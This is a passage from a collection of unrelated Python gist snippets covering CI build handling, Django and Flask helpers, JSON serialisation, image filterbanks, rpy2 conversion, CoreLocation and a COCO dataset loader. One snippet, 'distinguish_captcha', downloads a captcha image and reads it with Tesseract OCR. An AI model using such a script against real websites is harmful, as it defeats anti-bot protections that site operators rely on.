self.api = api
self.build_num = int(build_num or data['build_num'])
self._data = data or None
def __str__(self):
commits = self.data.get('all_commit_details')
subject = commits[-1]['subject'] if commits and len(commits) > 0 else '(No subject)'
return u'#{} {} {} {} {}'.format(self.build_num, self.queued_at, self.data['status'], self.data['branch'], subject)
def __repr__(self):
self_str = unicode(self).encode('ascii', 'backslashreplace')
return '<{}: {}>'.format(self.__class__.__name__, self_str)
def cancel(self):
print('Canceling build: {}'.format(self))
return self.api.post_project('{}/cancel'.format(self.build_num))
@property
def queued_at(self):
queued_at = self.data.get('usage_queued_at')
return queued_at and dateutil.parser.parse(queued_at)
@property
def data(self):
if self._data is None:
self._data = self.api.get_project('{}'.format(self.build_num))
return self._data
@property
def artifacts(self):
artifacts = self.api.get_project('{}/artifacts'.format(self.build_num))
return [a['url'] for a in artifacts]
@property
def status(self):
return self.data['status']
@property
def active(self):
if self.status in ['success', 'timedout', 'fixed', 'canceled', 'failed', 'not_run', 'retried', 'no_tests']:
return False
if self.status in ['not_running', 'scheduled', 'running', 'queued']:
return True
raise CommandError('Unknown CircleCI status: {!r}'.format(self.status))
def error(s, *args, **kwargs):
print(s.format(*args, **kwargs))
sys.exit(1)
```
#### File: hard-gists/3009143/snippet.py
```python
import json
import datetime
from decimal import Decimal
from mongoengine.queryset import queryset_manager
from mongoengine.queryset import QuerySet
from mongoengine.base import BaseList, BaseDict, ObjectId
def list_encoder(inst, obj, field, force_string=False):
"""
Encoder for iterable datatypes.
"""
if force_string:
return [str(x) for x in obj]
return [inst.default(x, field) for x in obj]
def dict_encoder(inst, obj, field, force_string=False):
"""
Encoder for dictinary like data type
"""
data = {}
for key in obj.keys():
if force_string:
data[key] = str(obj[key])
else:
data[key] = inst.default(obj[key], field)
return data
def data_encoder(inst, obj, field, force_string=False):
"""
Encoder for regular data types.
"""
if force_string:
return str(obj)
return obj
def object_id_encoder(inst, obj, field, force_string=False):
"""
Encoder for ObjectId
"""
return str(obj)
def model_encoder_factory(
fields={},
extra_encoders={},
reference_only_fields={}):
"""
This will return a custom json.JSONEncoder class that is will be
able to serialize a mongoengine queryset, or a iterable of
querysets.
fields: A dictionary, keys are data types, values are lists of
fields for each data types, to be serialized. Fields can be
attributes or object methods.
example:
{
AdCategory: ['title', 'slug'],
Region: ['name'],
}
extra_encoders: Contribute or override default encoders.
example:
{
MySpecialDataType: my_function_that_encodes,
MyOtherSpecialDataType: my_other_function_that_encodes,
}
reference_only_fields: Use this to avoid circular relations. This
will result in the serialized data to contain a string
representation of the object instead of a json representation.
{
Region: ['neighboring_regions'],
}
>>> from .models import AdCategory
>>> from .geo.models import Region
>>> from .utils import model_encoder_factory
>>> import json
>>> data = {
... 'regions': Region.objects.all(),
... 'categories': AdCategory.objects.all(),
... }
>>> fields = {
... Region: ['name' ],
... AdCategory: ['title', ],
... }
>>> enc = model_encoder_factory(fields=fields)
>>> json.dumps(data, cls=enc)
"""
# These encoders are matched by datatype. Still need to figure out
# whether it's faster to match using a hash or with isinstance().
encoders = {
BaseList: list_encoder,
QuerySet: list_encoder,
list: list_encoder,
tuple: list_encoder,
BaseDict: dict_encoder,
dict: dict_encoder,
int: data_encoder,
long: data_encoder,
unicode: data_encoder,
Decimal: data_encoder,
datetime.datetime: data_encoder,
datetime.date: data_encoder,
ObjectId: object_id_encoder,
}
# When creating your encoder by calling this factory, you may
# supply an extra_encoders parameter that will either contribute
# to, or override existing encoders.
encoders.update(extra_encoders)
# Caching keys. Not sure if it's necessary to be honest.
encoders_keys = encoders.keys()
class Encoder(json.JSONEncoder):
def default(self, obj, field=None):
"""
This a function is called by json.dumps
"""
# Get object type
obj_type = type(obj)
if obj_type in encoders_keys:
# If the object type exists in encoders, checker
# whether it is included in reference_only_fields, if
# yes, the encoder will force the result to be a
# string (or a list of strings) instead of an object,
# or list of objects.
force_string=False
if (reference_only_fields and obj
and obj_type in reference_only_fields
and field in reference_only_fields[obj_type]):
force_string = True
# Get the encoder and return its result. (The encoder
# is given self, because it may recurse for iterable
# items.)
return encoders[obj_type](
self,
obj,
field,
force_string=force_string,
)
# Now if the object type exists in fields, and the obj has
# not matched any datatypes in the list of encoders,
# create a dictionary of {field: value}.
if obj_type in fields:
data = {}
for field in fields[obj_type]:
# This is called again because it needs to convert
# the value using encoders.
data[field] = self.default(
getattr(obj, field),
field,
)
return data
elif callable(obj):
# If a supplied field is a callable, return the
# callable result.
return obj()
else:
# Finally if the field doesn't match anything, return
# it's string representation.
return {str(obj_type): None}
return Encoder
class Serializable(object):
"""
Your model can inherit from Serializable, it will get the
json_tree method that will automatically use the model's _fields
to attempt serialization.
example:
MyModel(Document, Serializable)
title = StringField()
then you can get all documents in a json structure by calling
MyModel.json_tree()
You should probably override the json_default_query method to
customize the current queryset.
You can also pass a queryset as an argument like so:
MyModel.json_tree(MyModel.objects.filter(title='test'))
"""
@classmethod
def json_default_query(cls):
return cls.objects.all()
@classmethod
def json_tree(cls, qs=None, fields={}, reference_only_fields={}):
if qs == None:
qs = cls.json_default_query()
if not fields:
fields = {cls: cls._fields.keys()}
encoder = model_encoder_factory(
fields=fields,
reference_only_fields=reference_only_fields,
)
return json.dumps(
qs,
cls=encoder,
)
```
#### File: hard-gists/3042651/snippet.py
```python
import os
from django import template
from django.utils.safestring import mark_safe
from django.conf import settings as s
register = template.Library()
def _mtime_suffix(file):
return int(os.stat(s.MEDIA_ROOT + file).st_mtime)
@register.simple_tag
def media_url(file):
return "%s%s?%s" %(s.MEDIA_URL, file, _mtime_suffix(file))
@register.simple_tag
def stylesheet_link(stylesheet):
return mark_safe('<link rel="stylesheet" href="%s%s?%d" type="text/css" />' %(
s.MEDIA_URL,
stylesheet,
_mtime_suffix(stylesheet),
))
@register.simple_tag
def script_link(script):
return mark_safe('<script type="text/javascript" src="%s%s?%d"></script>' %(
s.MEDIA_URL,
script,
_mtime_suffix(script)
))
```
#### File: hard-gists/305322/snippet.py
```python
import cgi
from google.appengine.ext import blobstore
from django.http import HttpResponse
import logging
def get_uploads(request, field_name=None, populate_post=False):
"""Get uploads sent to this handler.
Args:
field_name: Only select uploads that were sent as a specific field.
populate_post: Add the non blob fields to request.POST
Returns:
A list of BlobInfo records corresponding to each upload.
Empty list if there are no blob-info records for field_name.
"""
if hasattr(request,'__uploads') == False:
request.META['wsgi.input'].seek(0)
fields = cgi.FieldStorage(request.META['wsgi.input'], environ=request.META)
request.__uploads = {}
if populate_post:
request.POST = {}
for key in fields.keys():
field = fields[key]
if isinstance(field, cgi.FieldStorage) and 'blob-key' in field.type_options:
request.__uploads.setdefault(key, []).append(blobstore.parse_blob_info(field))
elif populate_post:
request.POST[key] = field.value
if field_name:
try:
return list(request.__uploads[field_name])
except KeyError:
return []
else:
results = []
for uploads in request.__uploads.itervalues():
results += uploads
return results
def send_blob(request, blob_key_or_info, content_type=None, save_as=None):
"""Send a blob-response based on a blob_key.
Sets the correct response header for serving a blob. If BlobInfo
is provided and no content_type specified, will set request content type
to BlobInfo's content type.
Args:
blob_key_or_info: BlobKey or BlobInfo record to serve.
content_type: Content-type to override when known.
save_as: If True, and BlobInfo record is provided, use BlobInfos
filename to save-as. If string is provided, use string as filename.
If None or False, do not send as attachment.
Raises:
ValueError on invalid save_as parameter.
"""
CONTENT_DISPOSITION_FORMAT = 'attachment; filename="%s"'
if isinstance(blob_key_or_info, blobstore.BlobInfo):
blob_key = blob_key_or_info.key()
blob_info = blob_key_or_info
else:
blob_key = blob_key_or_info
blob_info = None
logging.debug(blob_info)
response = HttpResponse()
response[blobstore.BLOB_KEY_HEADER] = str(blob_key)
if content_type:
if isinstance(content_type, unicode):
content_type = content_type.encode('utf-8')
response['Content-Type'] = content_type
else:
del response['Content-Type']
def send_attachment(filename):
if isinstance(filename, unicode):
filename = filename.encode('utf-8')
response['Content-Disposition'] = (CONTENT_DISPOSITION_FORMAT % filename)
if save_as:
if isinstance(save_as, basestring):
send_attachment(save_as)
elif blob_info and save_as is True:
send_attachment(blob_info.filename)
else:
if not blob_info:
raise ValueError('Expected BlobInfo value for blob_key_or_info.')
else:
raise ValueError('Unexpected value for save_as')
return response
```
#### File: hard-gists/3077639/snippet.py
```python
import csv
from tools import DynamicCommand # see https://gist.github.com/2724472
class Command(DynamicCommand):
"""
Easily export a model's objects in csv format. In this example the csv can be generated by executing:
./manage.py export your_model
"""
def your_model(self):
from your.app.models import YourModel
meta = {
'file': '/tmp/your_model.csv',
'class': YourModel,
'fields': ('title', 'description') # models fields you want to include
}
self._write_csv(meta)
def _write_csv(self, meta):
"""
:param meta: (dict) keys should be 'file' (string: absolute path), 'class' the Python class
object, 'fields' a list or tuple of field model field names (strings)
"""
f = open(meta['file'], 'w+')
writer = csv.writer(f, encoding='utf-8')
writer.writerow( meta['fields'] )
for obj in meta['class'].objects.all():
row = [unicode(getattr(obj, field)) for field in meta['fields']]
writer.writerow(row)
f.close()
print 'Data written to %s' % meta['file']
```
#### File: hard-gists/3078465/snippet.py
```python
from flask import Blueprint
import converters # module containing the custom converter classes
def add_app_url_map_converter(self, func, name=None):
"""
Register a custom URL map converters, available application wide.
:param name: the optional name of the filter, otherwise the function name
will be used.
"""
def register_converter(state):
state.app.url_map.converters[name or func.__name__] = func
self.record_once(register_converter)
# monkey-patch the Blueprint object to allow addition of URL map converters
Blueprint.add_app_url_map_converter = add_app_url_map_converter
# create the eyesopen Flask blueprint
bp = Blueprint('myblueprint', __name__)
# register the URL map converters that are required
bp.add_app_url_map_converter(converters.FooConverter, 'foo')
bp.add_app_url_map_converter(converters.BarConverter, 'bar')
```
#### File: hard-gists/30839ae0280a5077b8669757e5efa75d/snippet.py
```python
import inspect
import sound
import _ui
import _scene2
def_fmt = '\n\n%sdef %s():\n%s pass\n'
method_fmt = '\n%sdef %s(self):\n%s pass\n'
cls_method_fmt = '\n%sdef %s(cls):\n%s pass\n'
class_fmt = '\n\n%sclass %s:%s\n'
doc_fmt = '%s"""%s"""\n'
def handle_attribute(name, func, indent):
if isinstance(func, int) or isinstance(func, float):
return '\n%s%s = %s\n' % (indent, name, func)
else:
return '\n%s%s = "%s"\n' % (indent, name, func)
def get_info(modul, indentlevel=0, inclass=False):
_f = []
indent = ' ' * indentlevel
for name, func in inspect.getmembers(modul):
if callable(func):
if name == '__getattribute__':
continue
isfunc = 'function' in str(func)
if name == '__new__':
_f.append(cls_method_fmt % (indent, name, indent))
else:
_f.append((def_fmt if isfunc else method_fmt if inclass else class_fmt) % (indent, name, indent))
if not isfunc and not inclass:
get_info(func, indentlevel + 1, True)
else:
if inclass and name == '__doc__': # insert docstring
_f.insert(0, doc_fmt % (indent, func))
else:
_f.append(handle_attribute(name, func, indent))
return _f
def create_func(modul, modname, indentlevel=0, inclass=False):
print "processing %s" % modname
_f = []
indent = ' ' * indentlevel
for name, func in inspect.getmembers(modul):
if callable(func):
if name == '__getattribute__':
continue
isfunc = 'function' in str(func)
_f.append((def_fmt if isfunc else method_fmt if inclass else class_fmt) % (indent, name, indent))
if not isfunc and not inclass:
cls = get_info(func, indentlevel + 1, True)
_f += cls
else:
if name == '__doc__': # insert docstring
_f.insert(0, doc_fmt % (indent, func))
elif name not in ['__name__', '__package__']:
_f.append(handle_attribute(name, func, indent))
open(modname, 'w').write(''.join(_f))
print "processed %s" % modname
if __name__ == "__main__":
create_func(sound, 'sound.py')
create_func(_ui, '_ui.py')
create_func(_scene2, '_scene2.py')
print "done"
```
#### File: hard-gists/3094847/snippet.py
```python
from django import template
register = template.Library()
@register.filter(name='indent')
def indent_string(val, num_spaces=4):
return val.replace('\n', '\n' + ' '*num_spaces)
```
#### File: hard-gists/3129692/snippet.py
```python
import numpy as np
import matplotlib.pyplot as plt
from itertools import product, chain
from scipy.misc import lena
#from sklearn.externals.joblib import Parallel, delayed
def makeRFSfilters(radius=24, sigmas=[1, 2, 4], n_orientations=6):
""" Generates filters for RFS filterbank.
Parameters
----------
radius : int, default 28
radius of all filters. Size will be 2 * radius + 1
sigmas : list of floats, default [1, 2, 4]
define scales on which the filters will be computed
n_orientations : int
number of fractions the half-angle will be divided in
Returns
-------
edge : ndarray (len(sigmas), n_orientations, 2*radius+1, 2*radius+1)
Contains edge filters on different scales and orientations
bar : ndarray (len(sigmas), n_orientations, 2*radius+1, 2*radius+1)
Contains bar filters on different scales and orientations
rot : ndarray (2, 2*radius+1, 2*radius+1)
contains two rotation invariant filters, Gaussian and Laplacian of
Gaussian
"""
def make_gaussian_filter(x, sigma, order=0):
if order > 2:
raise ValueError("Only orders up to 2 are supported")
# compute unnormalized Gaussian response
response = np.exp(-x ** 2 / (2. * sigma ** 2))
if order == 1:
response = -response * x
elif order == 2:
response = response * (x ** 2 - sigma ** 2)
# normalize
response /= np.abs(response).sum()
return response
def makefilter(scale, phasey, pts, sup):
gx = make_gaussian_filter(pts[0, :], sigma=3 * scale)
gy = make_gaussian_filter(pts[1, :], sigma=scale, order=phasey)
f = (gx * gy).reshape(sup, sup)
# normalize
f /= np.abs(f).sum()
return f
support = 2 * radius + 1
x, y = np.mgrid[-radius:radius + 1, radius:-radius - 1:-1]
orgpts = np.vstack([x.ravel(), y.ravel()])
rot, edge, bar = [], [], []
for sigma in sigmas:
for orient in xrange(n_orientations):
# Not 2pi as filters have symmetry
angle = np.pi * orient / n_orientations
c, s = np.cos(angle), np.sin(angle)
rotpts = np.dot(np.array([[c, -s], [s, c]]), orgpts)
edge.append(makefilter(sigma, 1, rotpts, support))
bar.append(makefilter(sigma, 2, rotpts, support))
length = np.sqrt(x ** 2 + y ** 2)
rot.append(make_gaussian_filter(length, sigma=10))
rot.append(make_gaussian_filter(length, sigma=10, order=2))
# reshape rot and edge
edge = np.asarray(edge)
edge = edge.reshape(len(sigmas), n_orientations, support, support)
bar = np.asarray(bar).reshape(edge.shape)
rot = np.asarray(rot)[:, np.newaxis, :, :]
return edge, bar, rot
def apply_filterbank(img, filterbank):
from scipy.ndimage import convolve
result = []
for battery in filterbank:
response = [convolve(img, filt) for filt in battery]
#response = Parallel(n_jobs=5)(
#delayed(convolve)(img, filt) for filt in battery)
max_response = np.max(response, axis=0)
result.append(max_response)
print("battery finished")
return result
if __name__ == "__main__":
sigmas = [1, 2, 4]
n_sigmas = len(sigmas)
n_orientations = 6
edge, bar, rot = makeRFSfilters(sigmas=sigmas,
n_orientations=n_orientations)
n = n_sigmas * n_orientations
# plot filters
# 2 is for bar / edge, + 1 for rot
fig, ax = plt.subplots(n_sigmas * 2 + 1, n_orientations)
for k, filters in enumerate([bar, edge]):
for i, j in product(xrange(n_sigmas), xrange(n_orientations)):
row = i + k * n_sigmas
ax[row, j].imshow(filters[i, j, :, :], cmap=plt.cm.gray)
ax[row, j].set_xticks(())
ax[row, j].set_yticks(())
ax[-1, 0].imshow(rot[0, 0], cmap=plt.cm.gray)
ax[-1, 0].set_xticks(())
ax[-1, 0].set_yticks(())
ax[-1, 1].imshow(rot[1, 0], cmap=plt.cm.gray)
ax[-1, 1].set_xticks(())
ax[-1, 1].set_yticks(())
for i in xrange(2, n_orientations):
ax[-1, i].set_visible(False)
# apply filters to lena
img = lena().astype(np.float)
filterbank = chain(edge, bar, rot)
n_filters = len(edge) + len(bar) + len(rot)
response = apply_filterbank(img, filterbank)
# plot responses
fig2, ax2 = plt.subplots(3, 3)
for axes, res in zip(ax2.ravel(), response):
axes.imshow(res, cmap=plt.cm.gray)
axes.set_xticks(())
axes.set_yticks(())
ax2[-1, -1].set_visible(False)
plt.show()
```
#### File: hard-gists/3158388/snippet.py
```python
from django.core import exceptions
from django.conf import settings
from django.db.models import fields
from django.utils.translation import ugettext as _
from south.modelsinspector import add_introspection_rules
from django.db.models.fields.related import OneToOneField
__version__ = "1.1"
__author__ = "<NAME>"
__author__ = "<NAME> @ BeeDesk"
class BigIntegerField(fields.IntegerField):
def db_type(self, connection):
if settings.DATABASE_ENGINE.endswith('mysql'):
return "bigint"
elif settings.DATABASE_ENGINE.endswith('oracle'):
return "NUMBER(19)"
elif settings.DATABASE_ENGINE.endswith('postgres'):
return "bigint"
elif settings.DATABASE_ENGINE.endswith('sqlite3'):
return super(BigIntegerField, self).db_type(connection)
else:
raise NotImplemented
def get_internal_type(self):
return "BigIntegerField"
def to_python(self, value):
if value is None:
return value
try:
return long(value)
except (TypeError, ValueError):
raise exceptions.ValidationError(
_("This value must be a long integer."))
class BigAutoField(fields.AutoField):
def db_type(self, connection):
if settings.DATABASE_ENGINE.endswith('mysql'):
return "bigint AUTO_INCREMENT"
elif settings.DATABASE_ENGINE.endswith('oracle'):
return "NUMBER(19)"
elif settings.DATABASE_ENGINE.endswith('postgres'):
return "bigserial"
elif settings.DATABASE_ENGINE.endswith('sqlite3'):
return super(BigAutoField, self).db_type(connection)
else:
raise NotImplemented
def get_internal_type(self):
return "BigAutoField"
def to_python(self, value):
if value is None:
return value
try:
return long(value)
except (TypeError, ValueError):
raise exceptions.ValidationError(
_("This value must be a long integer."))
class BigForeignKey(fields.related.ForeignKey):
def db_type(self, connection):
rel_field = self.rel.get_related_field()
# next lines are the "bad tooth" in the original code:
if (isinstance(rel_field, BigAutoField) or
(not connection.features.related_fields_match_type and
isinstance(rel_field, BigIntegerField))):
# because it continues here in the django code:
# return IntegerField().db_type()
# thereby fixing any AutoField as IntegerField
return BigIntegerField().db_type(connection)
return rel_field.db_type(connection)
class BigOneToOneField(BigForeignKey, OneToOneField):
"""
If you use subclass model, you might need to name
the `ptr` field explicitly. This is the field type you
might want to use. Here is an example:
class Base(models.Model):
title = models.CharField(max_length=40, verbose_name='Title')
class Concrete(Base):
base_ptr = fields.BigOneToOneField(Base)
ext = models.CharField(max_length=12, null=True, verbose_name='Ext')
"""
pass
if 'south' in settings.INSTALLED_APPS:
add_introspection_rules([], ['^common\.fields\.BigIntegerField'])
add_introspection_rules([], ['^common\.fields\.BigAutoField'])
add_introspection_rules([], ['^common\.fields\.BigForeignKey'])
add_introspection_rules([], ['^common\.fields\.BigOneToOneField'])
```
#### File: hard-gists/3181989/snippet.py
```python
import sys
import StringIO
import requests
import PIL.Image
import tesserwrap
#: https://github.com/gregjurman/tesserwrap
tesseract = tesserwrap.tesseract()
def distinguish_captcha(image_url, show_origin_image=True):
#: preprocess
image_bytes = requests.get(image_url).content
origin_image = PIL.Image.open(StringIO.StringIO(image_bytes))
image = origin_image.point(lambda p: p * 1.5)\
.point(lambda p: 255 if p > 200 else 0)\
.convert("1")
#: distinguish the text
text = tesseract.ocr_image(image)
#: show the origin image
if show_origin_image:
origin_image.show()
return text.strip()
def main():
url = raw_input("Please input the url of captcha:\n > ").strip()
print >> sys.stderr, ">>> Press Ctrl + C to stop."
print >> sys.stderr, ">>> Press any key to continue."
while True:
raw_input()
print distinguish_captcha(url)
if __name__ == "__main__":
try:
print main()
except KeyboardInterrupt:
print >> sys.stderr, ">>> Exit."
```
#### File: hard-gists/3287286/snippet.py
```python
import sys, copy, os, itertools
import rpy2.robjects as robjects
import rpy2.rinterface as rinterface
from rpy2.robjects.vectors import SexpVector, ListVector
from rpy2.robjects.robject import RObjectMixin, RObject
import rpy2.robjects as robj
import numpy as np
import pandas.rpy.common as rcom
import pandas as pd
NA_TYPES = rcom.NA_TYPES
VECTOR_TYPES = rcom.VECTOR_TYPES
baseenv_ri = rinterface.baseenv
globalenv_ri = rinterface.globalenv
def my_ri2py(o):
res = None
try:
rcls = o.do_slot("class")
except LookupError, le:
rcls = [None]
if isinstance(o, SexpVector):
if 'xts' in rcls:
res = convert_xts_to_df(o)
if res is None:
res = robjects.default_ri2py(o)
return res
def convert_xts_to_df(o):
"""
Will convert xts objects to DataFrame
"""
dates = o.do_slot('index')
dates = np.array(dates, dtype=np.dtype("M8[s]"))
res = robjects.default_ri2py(o)
df = rcom.convert_robj(res)
df.index = dates
return df
robjects.conversion.ri2py = my_ri2py
def pd_py2ri(o):
"""
"""
res = None
if isinstance(o, pd.DataFrame) and isinstance(o.index, pd.DatetimeIndex):
res = convert_df_to_xts(o)
if res is None:
res = robjects.default_py2ri(o)
return res
def convert_df_to_xts(df, strings_as_factors=False):
r_dataframe = XTS(df)
return r_dataframe
class XTS(RObject):
""" R 'as.xts'.
"""
def __init__(self, df):
""" Create a xts.
"""
self.rdf = None
if isinstance(df, pd.DataFrame):
rdf = rcom.convert_to_r_dataframe(df)
self.rdf = rdf
xts = baseenv_ri.get("as.xts").rcall(tuple([('x', rdf)]), globalenv_ri)
super(XTS, self).__init__(xts)
else:
raise ValueError("Currently only supporting DataFrames")
def __repr__(self):
return self.rdf.__repr__()
robjects.conversion.py2ri = pd_py2ri
```
#### File: hard-gists/329142c1740500bd3797/snippet.py
```python
from CoreLocation import CLLocationManager, kCLDistanceFilterNone, kCLLocationAccuracyThreeKilometers
from Foundation import NSRunLoop, NSDate, NSObject
is_enabled = CLLocationManager.locationServicesEnabled()
is_authorized = CLLocationManager.authorizationStatus()
class MyLocationManagerDelegate(NSObject):
def init(self):
self = super(MyLocationManagerDelegate, self).init()
if not self:
return
self.locationManager = CLLocationManager.alloc().init()
self.locationManager.setDelegate_(self)
self.locationManager.setDistanceFilter_(kCLDistanceFilterNone)
self.locationManager.setDesiredAccuracy_(kCLLocationAccuracyThreeKilometers)
self.locationManager.startUpdatingLocation()
return self
def locationManager_didUpdateToLocation_fromLocation_(self, manager, newloc, oldloc):
print "NEW:", newloc.description()
if oldloc is not None:
print "OLD:", oldloc.description()
else:
print "OLD: <None>"
def locationManager_didFailWithError_(self, manager, err):
print "ERR:", err.description()
def main():
finder = MyLocationManagerDelegate.alloc().init()
for x in range(5):
print "loop", x
NSRunLoop.currentRunLoop().runUntilDate_(NSDate.dateWithTimeIntervalSinceNow_(10))
```
#### File: hard-gists/33e2172bafbb5dd794ab/snippet.py
```python
try:
import Queue
except ImportError:
import queue as Queue
import threading
import time
from matplotlib.path import Path
from PIL import Image
import numpy as np
import warnings
import os
import itertools
from retrying import retry
# Get pycocotools from https://github.com/pdollar/coco/archive/master.zip
# Go to coco-master/PythonAPI
# python setup.py build
# python setup.py install
from pycocotools.coco import COCO
from pycocotools import mask as cocomask
def fetch_from_COCO(filenames, img_list,
coco_info,
resize_images=False, resize_size=-1,
load_categories=['person']):
images = []
masks = []
assert len(filenames) == len(img_list)
for n, img_el in enumerate(img_list):
# load image
if not os.path.exists(filenames[n]):
print('Image %s is missing' % filenames[n])
continue
pth = filenames[n]
im = Image.open(pth)
coco, catIds, imgIds = coco_info
# load the annotations and build the mask
anns = coco.loadAnns(coco.getAnnIds(
imgIds=img_el['id'], catIds=catIds, iscrowd=None))
mask = np.zeros(im.size).transpose(1, 0)
for ann in anns:
catId = ann['category_id']
if type(ann['segmentation']) == list:
# polygon
for seg in ann['segmentation']:
# xy vertex of the polygon
poly = np.array(seg).reshape((len(seg)/2, 2))
closed_path = Path(poly)
nx, ny = img_el['width'], img_el['height']
x, y = np.meshgrid(np.arange(nx),
np.arange(ny))
x, y = x.flatten(), y.flatten()
points = np.vstack((x, y)).T
grid = closed_path.contains_points(points)
if np.count_nonzero(grid) == 0:
warnings.warn(
'One of the annotations that compose the mask '
'of %s was empty' % img_el['file_name'],
RuntimeWarning)
grid = grid.reshape((ny, nx))
mask[grid] = catId
else:
# mask
if type(ann['segmentation']['counts']) == list:
rle = cocomask.frPyObjects(
[ann['segmentation']],
img_el['height'], img_el['width'])
else:
rle = [ann['segmentation']]
grid = cocomask.decode(rle)[:, :, 0]
grid = grid.astype('bool')
mask[grid] = catId
# zero_pad
if resize_images:
rx, ry = resize_size
# resize (keeping proportions)
[x, y] = im.size
dx = float(rx)/x
dy = float(ry)/y
ratio = min(dx, dy)
x = int(x * ratio)
y = int(y * ratio)
# workaround for PIL problems..
@retry(stop_max_attempt_number=7, wait_fixed=2000)
def res(im, x, y):
return im.resize((x, y), Image.ANTIALIAS)
im = res(im, x, y)
# mask = mask / numpy.max(mask) * 255.0 --> only visualization
mask = Image.fromarray(mask.astype('uint8'))
mask = mask.resize((x, y), Image.NEAREST)
tmp = im
im = Image.new("RGB", (rx, ry))
im.paste(tmp, ((rx-x)/2, (ry-y)/2))
tmp = mask
# 80 obj categories
mask = Image.new("L", (rx, ry))
mask.paste(tmp, ((rx-x)/2, (ry-y)/2))
images.append(np.asarray(im))
masks.append(np.asarray(mask))
return images, masks, filenames
class COCOThread(threading.Thread):
"""Image Thread"""
def __init__(self, queue, out_queue):
threading.Thread.__init__(self)
self.queue = queue
self.out_queue = out_queue
def run(self):
while True:
# Grabs image path from queue
filenames, image_list, coco_info = self.queue.get()
try:
# Grab image
# print('reading image', image_path)
image_group, mask_group, filenames = fetch_from_COCO(
filenames, image_list, coco_info)
# Place image in out queue
self.out_queue.put((image_group, mask_group))
# Signals to queue job is done
self.queue.task_done()
except IOError:
print("Image in image_group corrupted!")
print(image_group)
class MSCOCO_dataset(object):
def __init__(self, minibatch_size=3, which_set="train", coco_path="/data/lisa/data/COCO/",
load_categories=['person']):
if which_set == "train":
partial_path = "train2014"
elif which_set == "valid":
partial_path = "val2014"
elif which_set == "test2014":
partial_path = "test2014"
elif which_set == "test2015":
partial_path = "test2015"
else:
raise ValueError("Unknown setting for which_set %s" % which_set)
base_path = os.path.join(coco_path, "images", partial_path)
ann_path = '%s/annotations_v1.0.3/instances_%s.json' % (coco_path,
partial_path)
filenames = []
# initialize COCO api for instance annotations
coco = COCO(ann_path)
# get all images containing the given categories
catIds = coco.getCatIds(catNms=load_categories)
imgIds = coco.getImgIds(catIds=catIds)
img_list = coco.loadImgs(imgIds)
self.coco_info = (coco, catIds, imgIds)
for img_el in img_list:
# load image
filename = '%s/%s' % (base_path, img_el['file_name'])
if not os.path.exists(filename):
print('Image %s is missing' % img_el['file_name'])
else:
filenames.append(filename)
assert(len(filenames) == len(img_list))
self.image_list = img_list
self.filenames = filenames
self.n_per_epoch = len(filenames)
self.n_samples_seen_ = 0
# Test random order
# random.shuffle(self.image_paths)
self.buffer_size = 5
self.minibatch_size = minibatch_size
self.input_qsize = 50
self.min_input_qsize = 10
if len(self.image_list) % self.minibatch_size != 0:
print("WARNING: Sample size not an even multiple of minibatch size")
print("Truncating...")
self.image_list = self.image_list[:-(
len(self.image_list) % self.minibatch_size)]
self.filenames = self.filenames[:-(
len(self.filenames) % self.minibatch_size)]
assert len(self.image_list) % self.minibatch_size == 0
assert len(self.filenames) % self.minibatch_size == 0
self.grouped_image_list = zip(*[iter(self.image_list)] *
self.minibatch_size)
self.grouped_filenames = zip(*[iter(self.filenames)] *
self.minibatch_size)
# Infinite...
self.grouped_elements = itertools.cycle(zip(self.grouped_filenames,
self.grouped_image_list,
[self.coco_info] * len(
self.grouped_image_list)))
self.queue = Queue.Queue()
self.out_queue = Queue.Queue(maxsize=self.buffer_size)
self._init_queues()
def _init_queues(self):
for i in range(1):
self.it = COCOThread(self.queue, self.out_queue)
self.it.setDaemon(True)
self.it.start()
# Populate queue with some paths to image data
for n, _ in enumerate(range(self.input_qsize)):
group = self.grouped_elements.next()
self.queue.put(group)
def __iter__(self):
return self
def __next__(self):
return self.next()
def next(self):
return self._step()
def reset(self):
self.n_samples_seen_ = 0
def _step(self):
if self.n_samples_seen_ >= self.n_per_epoch:
self.reset()
raise StopIteration("End of epoch")
image_group = self.out_queue.get()
self.n_samples_seen_ += self.minibatch_size
if self.queue.qsize() <= self.min_input_qsize:
for image_path_group in range(self.input_qsize):
group = self.grouped_elements.next()
self.queue.put(group)
return image_group
if __name__ == "__main__":
# Example usage
ds = MSCOCO_dataset()
start = time.time()
n_minibatches_to_run = 100
itr = 1
while True:
image_group = ds.next()
# time.sleep approximates running some model
time.sleep(1)
stop = time.time()
tot = stop - start
print("Threaded time: %s" % (tot))
print("Minibatch %s" % str(itr))
print("Time ratio (s per minibatch): %s" % (tot / float(itr)))
itr += 1
# test
if itr >= n_minibatches_to_run:
break
```
#### File: hard-gists/3454877/snippet.py
```python
import os, shlex
from twisted.internet import defer, utils, reactor, threads
from twisted.python import log, failure
from buildbot.buildslave import AbstractBuildSlave, AbstractLatentBuildSlave
from buildbot import config
class ScriptedLatedBuildSlave(AbstractLatentBuildSlave):
def __init__(self, name, password, start_script, stop_script, max_builds=None, notify_on_missing=[],
missing_timeout=60*20, build_wait_timeout=60*10, properties={}, locks=None):
AbstractLatentBuildSlave.__init__(self, name, password, max_builds, notify_on_missing,
missing_timeout, build_wait_timeout, properties, locks)
self.name = name
self.start_script = shlex.split(start_script)
self.stop_script = shlex.split(stop_script)
@defer.inlineCallbacks
def start_instance(self, build):
log.msg("Attempting to start '%s'" % self.name)
retval = yield utils.getProcessValue(self.start_script[0], self.start_script[1:])
defer.returnValue(retval == 0)
@defer.inlineCallbacks
def stop_instance(self, fast=False):
log.msg("Attempting to stop '%s'" % self.name)
retval = yield utils.getProcessValue(self.stop_script[0], self.stop_script[1:])
log.msg("slave destroyed (%s): Forcing its connection closed." % self.name)
yield AbstractBuildSlave.disconnect(self)
log.msg("We forced disconnection (%s), cleaning up and triggering new build" % self.name)
self.botmaster.maybeStartBuildsForSlave(self.name)
defer.returnValue(retval == 0)
```
#### File: hard-gists/347596/snippet.py
```python
import time
from django.utils.http import http_date
AJAX_NEGATIVE_CHECK_EXPIRES = 60 # object is still available
AJAX_POSITIVE_CHECK_EXPIRES = 60*10 # if object is not available (or taken)
def check_ajax(request):
# do stuff here
timeout = AJAX_NEGATIVE_CHECK_EXPIRES if avail else AJAX_POSITIVE_CHECK_EXPIRES
response = HttpResponse(json_result, mimetype='application/json')
response['Expires'] = http_date(time.time() + timeout)
return response
```
#### File: hard-gists/353499f2e6e407883b32/snippet.py
```python
import numpy as np
from theano import config, shared
from theano import scan
def load_mnist():
from gzip import open
from cPickle import load
from os.path import join, dirname
module_path = dirname(__file__)
with open(join(module_path, 'mnist.pkl.gz')) as data_file:
